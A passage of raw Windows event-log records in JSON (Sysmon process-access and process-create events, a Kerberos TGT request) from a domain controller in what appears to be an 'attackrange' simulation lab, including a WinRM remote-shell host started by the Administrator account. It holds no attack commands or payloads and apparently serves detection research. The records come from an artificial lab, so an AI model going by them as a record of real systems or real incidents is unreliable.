C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.332","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010214A0000}","TargetProcessId":"780","TargetImage":"C:\\Windows\\system32\\winlogon.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220312,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tSupplied Realm Name:\tattackrange.local\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"attackrange.local","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-1008","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2541,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.332\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-00100FBA0000}\r\nTargetProcessId: 1132\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\lsm.dll+b81f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.332","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-00100FBA0000}","TargetProcessId":"1132","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\lsm.dll+b81f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2542,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.332\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001031CF0000}\r\nTargetProcessId: 1324\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+827d|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.332","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001031CF0000}","TargetProcessId":"1324","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+827d|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2543,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.332\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010D6020100}\r\nTargetProcessId: 1808\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+6d83|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.332","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010D6020100}","TargetProcessId":"1808","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+6d83|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2544,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.341\r\nProcessGuid: {E2A3D6B1-1083-5F25-0000-0010797B0400}\r\nProcessId: 4264\r\nImage: C:\\Windows\\System32\\winrshost.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Host Process for WinRM's Remote Shell plugin\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: winrshost.exe\r\nCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-1083-5F25-0000-0020016E0400}\r\nLogonId: 0x46E01\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96\r\nParentProcessGuid: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nParentProcessId: 596\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.341","ProcessGuid":"{E2A3D6B1-1083-5F25-0000-0010797B0400}","Image":"C:\\Windows\\System32\\winrshost.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Host Process for WinRM's Remote Shell plugin","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"winrshost.exe","CommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","CurrentDirectory":"C:\\Windows\\system32\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-1083-5F25-0000-0020016E0400}","LogonId":"0x46e01","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96","ParentProcessGuid":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","ParentProcessId":"596","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2545,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.332\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1083-5F25-0000-0010797B0400}\r\nTargetProcessId: 4264\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.332","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1083-5F25-0000-0010797B0400}","TargetProcessId":"4264","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2546,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.332\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1083-5F25-0000-0010797B0400}\r\nTargetProcessId: 4264\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.332","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1083-5F25-0000-0010797B0400}","TargetProcessId":"4264","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2547,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.332\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nSourceProcessId: 1336\r\nSourceThreadId: 1448\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1083-5F25-0000-001091730400}\r\nTargetProcessId: 4188\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.332","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","SourceProcessId":"1336","SourceThreadId":"1448","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1083-5F25-0000-001091730400}","TargetProcessId":"4188","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
